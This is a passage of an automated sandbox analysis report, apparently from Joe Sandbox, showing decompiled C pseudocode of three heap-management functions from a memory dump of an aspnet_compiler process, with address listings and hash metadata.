				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E0194A80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
									_push(_t141);
									E0194A80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x18684d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x18684d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x18684d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x18684d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E0194A80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}











































                                                  0x018aab4a
                                                  0x018aab51
                                                  0x018aab57
                                                  0x018aab5b
                                                  0x018aab5e
                                                  0x018aab61
                                                  0x018aab64
                                                  0x018aab67
                                                  0x018aab6c
                                                  0x018aabbb
                                                  0x018aabbb
                                                  0x00000000
                                                  0x018aab6e
                                                  0x018aab6e
                                                  0x018aab73
                                                  0x018aad70
                                                  0x018aab79
                                                  0x018aab79
                                                  0x018aab83
                                                  0x018aab86
                                                  0x018aab8b
                                                  0x018aab8f
                                                  0x018aab9a
                                                  0x018aab9d
                                                  0x018aaba4
                                                  0x018f242c
                                                  0x018f2439
                                                  0x018f243e
                                                  0x018f243e
                                                  0x018aabaa
                                                  0x018aabad
                                                  0x018aabad
                                                  0x018aabb5
                                                  0x018aabb5
                                                  0x018aabb9
                                                  0x018aabc6
                                                  0x018aabca
                                                  0x018aad7a
                                                  0x018aabd0
                                                  0x018aabd0
                                                  0x018aabda
                                                  0x018aabdd
                                                  0x018aabe2
                                                  0x018aabe6
                                                  0x018aabf1
                                                  0x018aabf4
                                                  0x018aabfb
                                                  0x018f2446
                                                  0x018f2453
                                                  0x018f2458
                                                  0x018f2458
                                                  0x018aac01
                                                  0x018aac04
                                                  0x018aac04
                                                  0x018aac0c
                                                  0x018aac0c
                                                  0x018aac10
                                                  0x018aad6b
                                                  0x018aac16
                                                  0x018aac16
                                                  0x018aac1c
                                                  0x018aaca7
                                                  0x018aacba
                                                  0x018aacbd
                                                  0x018aacc8
                                                  0x018aacc9
                                                  0x018aaccc
                                                  0x018aaccf
                                                  0x018aad00
                                                  0x018aad04
                                                  0x018aad07
                                                  0x018aad0a
                                                  0x018aad0d
                                                  0x00000000
                                                  0x018aad0f
                                                  0x00000000
                                                  0x018aad0f
                                                  0x00000000
                                                  0x018aad0d
                                                  0x018aad40
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018aacd1
                                                  0x018aacd1
                                                  0x018aacd4
                                                  0x018aad16
                                                  0x018aad1b
                                                  0x018aad54
                                                  0x018aad1d
                                                  0x018aad20
                                                  0x018aad27
                                                  0x018aad27
                                                  0x018aacd6
                                                  0x018aacd6
                                                  0x018aacdb
                                                  0x018aad39
                                                  0x018aacdd
                                                  0x018aacdd
                                                  0x018aacdd
                                                  0x018aacdb
                                                  0x018aace7
                                                  0x018aaced
                                                  0x018f247f
                                                  0x018f247f
                                                  0x018aacf6
                                                  0x018aabbd
                                                  0x018aabc3
                                                  0x018aabc3
                                                  0x018aac2b
                                                  0x018aac2f
                                                  0x018aac32
                                                  0x018f2460
                                                  0x018f2460
                                                  0x018aac3b
                                                  0x018aac40
                                                  0x018aad42
                                                  0x018aad4a
                                                  0x018aac46
                                                  0x018aac46
                                                  0x018aac48
                                                  0x018aad5b
                                                  0x018aac4e
                                                  0x018aac4e
                                                  0x018aac51
                                                  0x018aac58
                                                  0x018aac5d
                                                  0x018aac66
                                                  0x018aac6d
                                                  0x018aac74
                                                  0x018aac77
                                                  0x018f2467
                                                  0x018f2472
                                                  0x018f2477
                                                  0x018f2477
                                                  0x018aac77
                                                  0x018aac7d
                                                  0x018aac83
                                                  0x018aac88
                                                  0x018aac88
                                                  0x018aac8c
                                                  0x018aaca4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018aac8e
                                                  0x018aac8e
                                                  0x018aac90
                                                  0x018aac93
                                                  0x00000000
                                                  0x018aac46
                                                  0x018aac40
                                                  0x018aac1c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018aabb9
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0867bb7cd5041ee2972b3c5b38702d4cac363a7f5bade6b96f2e6295c376510e
                                                  • Instruction ID: 0d9e28cc18eab1bcdd09b327ce0dfcad85f1711541323494155fdf2364848726
                                                  • Opcode Fuzzy Hash: 0867bb7cd5041ee2972b3c5b38702d4cac363a7f5bade6b96f2e6295c376510e
                                                  • Instruction Fuzzy Hash: 5481B431A002198BFB28CF5DC494B7AB7F1EB84315F994299D985DF781D630EE45CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019525DD Relevance: .2, Instructions: 232COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E019525DD(intOrPtr __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, signed int _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t82;
				signed int _t102;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t154;
				signed int _t160;
				signed int _t168;
				unsigned int _t175;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				unsigned int _t200;
				unsigned int _t201;
				signed char _t202;
				signed int _t204;
				signed int _t210;
				intOrPtr _t211;
				signed int _t212;

				_t133 = _a4;
				_v24 = __edx;
				_v16 = __ecx;
				L01952E3F(__ecx, __edx, __eflags, _t133);
				_t204 = _a8;
				_t187 = 0x10;
				_t210 = (( *_t133 ^  *0x1976110 ^ _t133) >> 0x00000001 & 0x00007fff) - _t204;
				if(_t210 != 0 && ( *(_v16 + 0x38) & 0x00000001) != 0) {
					_t185 = (_t133 + _t204 * 0x00000008 + 0x00000fff & 0xfffff000) - _t133 + _t204 * 8 >> 3;
					_t132 = _t185 << 3;
					if(_t132 >= _t187) {
						if(__eflags != 0) {
							__eflags = _t132 - 0x20;
							if(_t132 < 0x20) {
								_t204 = _t204 + 1;
								_t210 = _t210 - 1;
								__eflags = _t210;
							}
						}
					} else {
						_t204 = _t204 + _t185;
						_t210 = _t210 - _t185;
					}
				}
				if(_t210 << 3 < _t187) {
					_t204 = _t204 + _t210;
				}
				_t74 =  *0x1976110; // 0x6860035f
				asm("sbb edx, edx");
				_t189 =  !_t187 & _t210;
				_t211 = _v24;
				_v20 = _t189;
				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
				_t152 = _t133 - _t211;
				_t77 = _t133 - _t211 >> 0xc;
				_v28 = _t77;
				_t80 = (_t77 ^  *0x1976110 ^ _t133) & 0x000000ff;
				_v32 = _t80;
				 *(_t133 + 4) = _t80;
				_t82 = _t204 << 3;
				if(_t189 != 0) {
					_t82 = _t82 + 0x10;
				}
				_t190 = _t189 | 0xffffffff;
				_t154 = 0x3f;
				_v12 = E018CD340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
				_v8 = _t190;
				_t191 = _t190 | 0xffffffff;
				_v12 = _v12 & E018CD0F0(_t86 | 0xffffffff, _v28, _t191);
				_v8 = _v8 & _t191;
				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
				_t212 = _v20;
				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
				_v12 = _t193;
				_v8 = _t160;
				if((_t193 | _t160) != 0) {
					 *(_t133 + 4) = _v32 | 0x00000200;
					_t117 = _a12 & 0x00000001;
					_v32 = _t117;
					if(_t117 == 0) {
						L0189FFB0(_t133, _t204, _v16);
						_t193 = _v12;
					}
					_t212 = _v20;
					_t200 =  !_v8;
					_t121 = _t200 & 0x000000ff;
					_t201 = _t200 >> 8;
					_t44 = _t121 + 0x186ac00; // 0x6070708
					_t122 = _t201 & 0x000000ff;
					_t202 = _t201 >> 8;
					_t175 = _t202 >> 8;
					_t45 = _t122 + 0x186ac00; // 0x6070708
					_t123 = _t202 & 0x000000ff;
					_t47 = _t175 + 0x186ac00; // 0x6060706
					_t48 = _t123 + 0x186ac00; // 0x6070708
					_t142 = _v16;
					if(L01952FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
						_t212 = _t212 + _t204;
						_t204 = 0;
					}
					if(_v32 == 0) {
						E018A2280(_t125, _t142);
					}
					_t133 = _a4;
					 *_a16 = 0xff;
					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
				}
				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x1976110 ^ _t133) & 0x0000fffe;
				if(_t212 != 0) {
					_t194 = _t133 + _t204 * 8;
					_t134 =  *0x1976110; // 0x6860035f
					if(_t204 == 0) {
						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
						__eflags = _t102;
					} else {
						_t102 = _t204 << 0x10;
					}
					_t135 = _v24;
					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
					_t168 = _t194 + _t212 * 8;
					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x1976110 ^ _t194) & 0x000000ff;
					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x1976110 ^ _t168) & 0x7fff0000;
					}
					L0195241A(_v16, _t135, _t194, _a12, _a16);
				}
				return _t204;
			}











































                                                  0x019525e6
                                                  0x019525f6
                                                  0x019525fb
                                                  0x019525fe
                                                  0x01952603
                                                  0x01952610
                                                  0x01952611
                                                  0x01952613
                                                  0x0195262f
                                                  0x01952634
                                                  0x01952639
                                                  0x01952641
                                                  0x01952643
                                                  0x01952646
                                                  0x01952648
                                                  0x01952649
                                                  0x01952649
                                                  0x01952649
                                                  0x01952646
                                                  0x0195263b
                                                  0x0195263b
                                                  0x0195263d
                                                  0x0195263d
                                                  0x01952639
                                                  0x01952651
                                                  0x01952653
                                                  0x01952655
                                                  0x01952657
                                                  0x0195265c
                                                  0x01952668
                                                  0x0195266a
                                                  0x01952675
                                                  0x0195267c
                                                  0x01952680
                                                  0x01952684
                                                  0x01952687
                                                  0x01952692
                                                  0x01952695
                                                  0x01952698
                                                  0x0195269d
                                                  0x019526a2
                                                  0x019526a4
                                                  0x019526a4
                                                  0x019526a8
                                                  0x019526b2
                                                  0x019526c0
                                                  0x019526c6
                                                  0x019526c9
                                                  0x019526d1
                                                  0x019526d4
                                                  0x019526e2
                                                  0x019526ea
                                                  0x019526ed
                                                  0x019526f1
                                                  0x019526f6
                                                  0x019526f9
                                                  0x01952707
                                                  0x0195270d
                                                  0x01952710
                                                  0x01952713
                                                  0x01952718
                                                  0x0195271d
                                                  0x0195271d
                                                  0x01952722
                                                  0x01952750
                                                  0x01952758
                                                  0x0195275d
                                                  0x01952760
                                                  0x01952766
                                                  0x01952769
                                                  0x0195276e
                                                  0x01952771
                                                  0x01952777
                                                  0x0195277d
                                                  0x01952783
                                                  0x01952791
                                                  0x019527a7
                                                  0x019527a9
                                                  0x019527ab
                                                  0x019527ab
                                                  0x019527b1
                                                  0x019527b4
                                                  0x019527b4
                                                  0x019527bc
                                                  0x019527bf
                                                  0x019527c2
                                                  0x019527c2
                                                  0x019527db
                                                  0x019527df
                                                  0x019527e5
                                                  0x019527e8
                                                  0x019527f0
                                                  0x019527ff
                                                  0x019527ff
                                                  0x019527f2
                                                  0x019527f4
                                                  0x019527f4
                                                  0x0195281a
                                                  0x01952824
                                                  0x01952826
                                                  0x01952834
                                                  0x01952843
                                                  0x01952858
                                                  0x01952858
                                                  0x01952866
                                                  0x01952866
                                                  0x01952873

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4da0ce96f88b462fc4036c36a331e129862cefcc0c94180b8440e2fb42d582ae
                                                  • Instruction ID: 6657b46b3770f7978d65b0ee1bb3179cc615a06114d809c8742e16edc5716b0f
                                                  • Opcode Fuzzy Hash: 4da0ce96f88b462fc4036c36a331e129862cefcc0c94180b8440e2fb42d582ae
                                                  • Instruction Fuzzy Hash: 6281E472A001158BDB18CF79C8906BEBBF1FF88311B1986B9D815EB385DB34E901CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01951D55 Relevance: .2, Instructions: 226COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E01951D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1961070);
				E018DD08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E0195337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E019533B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E018C96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E019533B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E018BE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1975880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = L018BDFDF(_t91, 1, _t142);
					}
					return E018DD0D1(_t103);
				}
			}





































                                                  0x01951d55
                                                  0x01951d55
                                                  0x01951d57
                                                  0x01951d5c
                                                  0x01951d63
                                                  0x01951d66
                                                  0x01951d69
                                                  0x01951d6c
                                                  0x01951d6e
                                                  0x01951d71
                                                  0x01951d74
                                                  0x01951d77
                                                  0x01951d7a
                                                  0x01951d7d
                                                  0x01951d82
                                                  0x01951d85
                                                  0x01951d88
                                                  0x01951d8d
                                                  0x01951d90
                                                  0x01951d94
                                                  0x01951d96
                                                  0x01951d98
                                                  0x01951d98
                                                  0x01951d9b
                                                  0x01951d9e
                                                  0x00000000
                                                  0x01951da1
                                                  0x01951da5
                                                  0x01951e78
                                                  0x01951e78
                                                  0x01951e82
                                                  0x01951e87
                                                  0x01951e8a
                                                  0x01951e8d
                                                  0x01951e92
                                                  0x01951e95
                                                  0x01951e98
                                                  0x01951e9b
                                                  0x01951ede
                                                  0x01951ee3
                                                  0x01951ee8
                                                  0x01951ef2
                                                  0x01951ef2
                                                  0x01951ef5
                                                  0x01951ef8
                                                  0x01951efe
                                                  0x01951f03
                                                  0x00000000
                                                  0x01951f09
                                                  0x01951f0c
                                                  0x01951f0e
                                                  0x01951f11
                                                  0x00000000
                                                  0x01951f17
                                                  0x01951f17
                                                  0x01951f1a
                                                  0x01951f31
                                                  0x01951f34
                                                  0x01951f3f
                                                  0x01951f42
                                                  0x01951f45
                                                  0x01951f47
                                                  0x01951f4a
                                                  0x01951f4d
                                                  0x01951f4f
                                                  0x01951f63
                                                  0x01951f65
                                                  0x01951f67
                                                  0x00000000
                                                  0x01951f69
                                                  0x01951f69
                                                  0x01951f72
                                                  0x01951f72
                                                  0x01951f75
                                                  0x01951f77
                                                  0x00000000
                                                  0x00000000
                                                  0x01951f6e
                                                  0x01951f70
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01951f70
                                                  0x01951f83
                                                  0x01951f83
                                                  0x01951f85
                                                  0x00000000
                                                  0x01951f85
                                                  0x01951f51
                                                  0x01951f53
                                                  0x01951f5a
                                                  0x01951f5c
                                                  0x01951f87
                                                  0x01951f87
                                                  0x01951f87
                                                  0x01951f8b
                                                  0x01951f8d
                                                  0x01951f90
                                                  0x00000000
                                                  0x01951f90
                                                  0x01951f1c
                                                  0x01951f1c
                                                  0x00000000
                                                  0x01951f22
                                                  0x01951f22
                                                  0x01951f25
                                                  0x01951f28
                                                  0x01951f97
                                                  0x01951f97
                                                  0x01951f9d
                                                  0x01951fa7
                                                  0x01951faa
                                                  0x01951fb1
                                                  0x01951fb9
                                                  0x01951fbd
                                                  0x01951fbe
                                                  0x01951fc0
                                                  0x01951f2a
                                                  0x01951f93
                                                  0x01951f93
                                                  0x01951f95
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01951f95
                                                  0x01951f28
                                                  0x01951f1c
                                                  0x01951f1a
                                                  0x01951f11
                                                  0x01951e9d
                                                  0x01951ea0
                                                  0x01951eae
                                                  0x01951eb4
                                                  0x01951ebc
                                                  0x01951ebc
                                                  0x01951ec2
                                                  0x01951ec8
                                                  0x01951ecd
                                                  0x00000000
                                                  0x01951ed3
                                                  0x01951ed3
                                                  0x00000000
                                                  0x01951ed3
                                                  0x01951ecd
                                                  0x01951dab
                                                  0x01951dab
                                                  0x01951db1
                                                  0x01951db3
                                                  0x01951db9
                                                  0x01951dbf
                                                  0x01951dc2
                                                  0x01951dda
                                                  0x01951ddd
                                                  0x01951de0
                                                  0x01951de9
                                                  0x01951dec
                                                  0x01951def
                                                  0x01951df1
                                                  0x01951df3
                                                  0x01951e0a
                                                  0x01951e0c
                                                  0x01951e0e
                                                  0x00000000
